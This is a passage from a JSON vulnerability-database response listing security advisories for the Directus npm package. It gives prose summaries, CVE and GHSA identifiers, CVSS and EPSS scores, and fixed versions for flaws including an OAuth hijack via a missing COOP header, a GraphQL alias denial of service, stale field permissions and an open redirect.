"vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ 
"CVE-2025-64747", "GHSA-vv2v-pw69-8crf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v6mk-ybv3-tyc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71665?format=api", "vulnerability_id": "VCID-v9s1-9n1m-bubs", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35408", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02087", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02079", "published_at": "2026-06-13T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00955", "published_at": "2026-06-11T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00953", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35408" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } 
], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35408", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35408" }, { "reference_url": "https://github.com/advisories/GHSA-8m32-p958-jg99", "reference_id": "GHSA-8m32-p958-jg99", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8m32-p958-jg99" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99", "reference_id": "GHSA-8m32-p958-jg99", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35408", "GHSA-8m32-p958-jg99" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9s1-9n1m-bubs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359856?format=api", "vulnerability_id": 
"VCID-y6cy-k9c2-pkcb", "summary": "Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. 
This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh" }, { "reference_url": "https://github.com/advisories/GHSA-6q22-g298-grjh", "reference_id": "GHSA-6q22-g298-grjh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6q22-g298-grjh" } ], "fixed_packages": [ { "url": 
"http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "GHSA-6q22-g298-grjh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y6cy-k9c2-pkcb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90667?format=api", "vulnerability_id": "VCID-ywqb-qrvw-hfbh", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.13.0, Directus does not properly clean up field-level permissions when a field is deleted. When a field is removed from a collection, its reference in the permissions table remains intact. This stale reference creates a security gap: if another field is later created using the same name, it inherits the outdated permission entry. This behavior can unintentionally grant roles access to data they should not be able to read or modify. The issue is particularly risky in multi-tenant or production environments, where administrators may reuse field names, assuming old permissions have been fully cleared. 
Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64746", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13876", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13908", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13793", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13906", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64746" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8", "reference_id": "84d7636969083387164ce5d2fd15a65e11e2d0b8", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/" } ], "url": "https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64746", "reference_id": "CVE-2025-64746", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": 
"MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64746" }, { "reference_url": "https://github.com/advisories/GHSA-9x5g-62gj-wqf2", "reference_id": "GHSA-9x5g-62gj-wqf2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9x5g-62gj-wqf2" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2", "reference_id": "GHSA-9x5g-62gj-wqf2", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64746", 
"GHSA-9x5g-62gj-wqf2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywqb-qrvw-hfbh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71813?format=api", "vulnerability_id": "VCID-z5ud-p9th-mff2", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35410", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03617", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03634", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04268", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04269", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35410" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35410", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", 
"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35410" }, { "reference_url": "https://github.com/advisories/GHSA-cf45-hxwj-4cfj", "reference_id": "GHSA-cf45-hxwj-4cfj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cf45-hxwj-4cfj" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj", "reference_id": "GHSA-cf45-hxwj-4cfj", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35410", "GHSA-cf45-hxwj-4cfj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z5ud-p9th-mff2" } ], 
"fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.4.1" }